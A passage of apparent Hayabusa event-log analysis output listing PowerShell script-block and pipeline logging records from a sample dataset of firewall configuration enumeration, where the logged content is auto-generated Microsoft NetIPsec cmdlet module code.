$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecIdentity ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeSA ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] 